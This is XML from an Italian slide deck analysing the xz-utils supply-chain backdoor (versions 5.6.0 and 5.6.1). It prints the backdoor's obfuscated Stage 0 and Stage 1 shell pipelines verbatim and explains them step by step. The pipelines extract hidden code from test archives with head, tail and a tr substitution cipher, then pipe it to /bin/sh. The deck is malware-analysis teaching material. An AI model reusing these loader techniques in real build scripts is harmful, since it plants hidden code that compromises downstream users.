            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 2&gt;&amp;1" redirige stream d'errore e di output verso </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>null</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, "silenziando" l'esecuzione.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195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58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6415"/>
            <a:ext cx="11853204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Stage 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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  <a:latin typeface="Trade Gothic Next Light"/>
              </a:rPr>
              <a:t>Se si clonasse la repository per poi eseguire su riga di comando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2100">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="it-IT" sz="2100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>cat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 ./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tests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/files/bad-3-corrupt_lzma2.xz | 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tr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 "\t \-_" " \t_\-" | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="21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2100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> –d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Si otterrebbe un codice sorgente che, ordinato con caratteri di "a capo", apparirebbe come segue nelle prossime slide, rispettivamente in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xz-utils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> versione 5.6.0 e 5.6.1 .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sono evidenziate in rosso le differenze principali.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30870540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59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50839" y="1791222"/>
            <a:ext cx="13573848" cy="55707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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$ 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cat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./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tests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/files/bad-3-corrupt_lzma2.xz | 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tr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"\t \-_" " \t_\-" | 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-d
####Hello####
</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="11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0x86 0xF9 0x5A 0xF7 0x2E 0x68 0x6A 0xBC</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="11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^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= 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if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test -f ../../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config.status;then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^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= ../../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="../../$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srcdir"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fi
export i="((head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) &amp;&amp; head -c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+724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)";
(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-dc $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tests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/files/good-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large_compressed.lzma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| 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$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i|tail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-c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+31265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| 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tr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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>"\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131"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"\0-\377")| </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="11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-F </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>raw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> --lzma1 -dc|/bin/sh
####World####</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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06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Introduzione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73743" y="1849693"/>
            <a:ext cx="12115185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Esempio: </a:t>
            </a:r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caso SUNBURST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SolarWinds</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (2020)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="3200" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6" descr="Immagine che contiene testo, diagramma, schermata, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADC203C1-B107-B850-63DE-EAC9CF5A3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67" t="3052" r="149" b="3794"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1684579" y="2374308"/>
            <a:ext cx="8606644" cy="447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836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60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50839" y="1553097"/>
            <a:ext cx="13573848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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>$ 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cat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./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tests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/files/bad-3-corrupt_lzma2.xz | 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tr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"\t \-_" " \t_\-" | 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-d
####Hello####</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="10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0xE5 0x55 0x89 0xB7 0x24 0x04 0xD8 0x17</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[ ! $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uname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) = "Linux" ] &amp;&amp; exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[ ! $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uname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) = "Linux" ] &amp;&amp; exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[ ! $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uname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) = "Linux" ] &amp;&amp; exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[ ! $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uname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) = "Linux" ] &amp;&amp; exit 0</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>[ ! $(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>uname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) = "Linux" ] &amp;&amp; exit 0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^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= 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if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test -f ../../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config.status;then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^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= ../../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="../../$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srcdir"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fi
export i="((head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null) &amp;&amp; head -c +2048 &amp;&amp;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
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 &amp;&amp; head -c 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+939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)";
(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-dc $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tests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/files/good-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large_compressed.lzma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| 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$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i|tail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-c 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+31233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| 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tr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"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"\0-\377")| </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1000">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="10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-F 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raw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 --lzma1 -dc|/bin/sh
####World####</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="10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081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61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7662"/>
            <a:ext cx="41840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Stage 1</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Immagine 10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EC5E5C30-5C51-0CE0-68BD-6FE925C27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446" y="1457633"/>
            <a:ext cx="6929141" cy="5270090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8EB6A2C8-A6A4-FCE0-39F4-C770C26CDE06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2672522" y="3768587"/>
            <a:ext cx="1258956" cy="3644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BE396D0C-D663-FAB1-41B7-EA1ED30DE65D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4119218" y="3266108"/>
            <a:ext cx="463823" cy="13804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526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62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6415"/>
            <a:ext cx="11864247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Stage 1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Questo stage si concentra sull'ultima riga dello scorso Bash file, dove viene processato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>good_large-compressed.lzma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Prima di arrivare a questa riga, le istruzioni precedenti fanno questo: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(solo in 5.6.1) verifica se il programma sta andando su Linux;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Viene definita</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> $i </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>come  una funzione che seleziona quali Byte ignorare/ammettere.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780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143565" y="3641587"/>
            <a:ext cx="1197941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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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 &amp;&amp; head -c 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+939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)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:b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(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-dc $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srcdir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tests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/files/good-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large_compressed.lzma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eval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$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i|tail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-c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+31233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tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"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"\0-\377")| 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-F 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raw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--lzma1 -dc|/bin/sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>####World####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22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63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6415"/>
            <a:ext cx="11864247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Stage 1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Decompressione di good-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>large_compressed.lzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> e invia su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdout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780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143565" y="2515152"/>
            <a:ext cx="1197941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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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 &amp;&amp; head -c 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+939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)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(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-dc $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srcdir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tests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/files/good-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large_compressed.lzma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$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i|tail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-c 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+31233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tr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"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"\0-\377")|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-F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raw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--lzma1 -dc|/bin/sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>####World####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6091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64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6415"/>
            <a:ext cx="11864247" cy="24314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Stage 1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Prende l'output precedente e lo dà in input alla funzione </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$i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  <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manda l'output su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdout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780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143565" y="2515152"/>
            <a:ext cx="1197941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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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 &amp;&amp; head -c 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+939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)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(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-dc $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tests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/files/good-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large_compressed.lzma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eval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$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i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|tail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-c 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+31233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tr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"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"\0-\377")|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-F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raw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--lzma1 -dc|/bin/sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>####World####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7" name="Immagine 6" descr="Immagine che contiene modello, tappeto, tessuto, monocromatico&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FFDC9EE-B936-2F01-55ED-1D9EDB487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63"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3048000" y="4556883"/>
            <a:ext cx="6096000" cy="10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321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65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6087"/>
            <a:ext cx="11864247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Stage 1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Prende l'output precedente ed esclude i primi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Byte, invia il resto su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.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780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143565" y="2515152"/>
            <a:ext cx="1197941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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [...]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>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 &amp;&amp; head -c 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+939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)";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>(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-dc $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tests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/files/good-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large_compressed.lzma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$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i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|tail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-c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>+31233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tr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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>"\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113"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"\0-\377")|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-F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raw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--lzma1 -dc|/bin/sh</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="it-IT" sz="1000">
                <a:latin typeface="Consolas"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="it-IT" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>####World####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6660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66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7018"/>
            <a:ext cx="1186424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Stage 1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Applica un cifrario di sostituzione in ottale che mappa array di Byte verso range 0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  <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> - 377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  <a:r>
              <a:rPr lang="it-IT" sz="2400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range da 114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  <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a 321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range da 322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  <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a 377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range da 35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  <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a 47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range da 14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  <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a 34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  <a:endParaRPr lang="it-IT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range da 0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  <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a 13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range da 50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  <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a 113</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" baseline="-2500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780D70-F347-5610-235E-C66AB628A92C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="143565" y="2515152"/>
            <a:ext cx="1197941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>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
              </a:rPr>
              <a:t>    [...]</a:t>
